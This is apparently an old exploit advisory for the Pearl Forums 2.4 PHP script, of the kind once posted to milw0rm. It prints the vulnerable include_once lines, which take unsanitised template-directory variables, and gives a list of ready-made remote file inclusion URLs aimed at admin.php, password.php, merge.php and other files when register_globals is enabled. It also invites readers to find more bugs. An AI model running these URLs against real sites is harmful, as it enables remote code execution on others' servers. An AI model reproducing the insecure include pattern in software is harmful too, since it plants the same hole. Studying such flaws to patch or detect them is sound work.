| __ \ | \/ | \ \ / ()
| | | | __ | \ / | __ ___ __ \ \ / / _ _ __ _ _ ___
| | | | '| | |\/| |/ _` \ \/ / \ \/ / | | '| | | / |
| || | | | | | | (| |> < \ / | | | | || \__ \
|/|| || |_|\,//\\ \/ ||_| \,|_/
/////////////////////////////////////////////////////////////////////////////////////////////////////////////
//Script:Pearl Forums
//Author: Dr Max Virus
//Location:Egypt :)
//Description:The main Script Of Pearl Products
//Affected Version:2.4
//D
script:http://sourceforge.net/project/downloading.php?group_id=102974&use_mirror=switch&filename=pearlforums2.4.zip&351611
/////////////////////////////////////////////////////////////////////////////////////////////////////////////
//----------------------------------------------------------------------------------
Bug in
adressbook.php & admin.php & merge.php &
more than
u expected files r vulnerable just try to check all files
Like the Vulnerable Scripts Of Pearl
--------------------------------------------------------------------------------\\
Vul Codes:
include_once("$GlobalSettings[templatesDirectory]/addressbook.php");
include_once("$templatesDirectory/admin.php");
Exploits:
Note that more variables are not sanitized so Exploits can work
Successfuly when
register_globals=on
code
http://[target]/[path]/includes/admin.php?templatesDirectory-evill code
http://[target]/[path]/includes/password.php?GlobalSettings[templatesDirectory]=evill
code
http://[target]/[path]/includes/profile.php?GlobalSettings[templatesDirectory]=evill
code
http://[target]/[path]/includes/merge.php?GlobalSettings[templatesDirectory]=evill
code
http://[target]/[path]/includes/adminPolls.php?GlobalSettings[templatesDirectory]=evill
code
http://[target]/[path]/includes/poll.php?GlobalSettings[templatesDirectory]=evill
code
And Many Bug u can discovered just download the script
-----------------------------------------------------------------------------------
Thx To:str0ke & www.milw0rm.com & www.zone-h.com & All My Friends
Special Gr33Ts:ASIANEAGLE & Kacper & The Master
////////////////////////////////////////////////////////////////////////////////////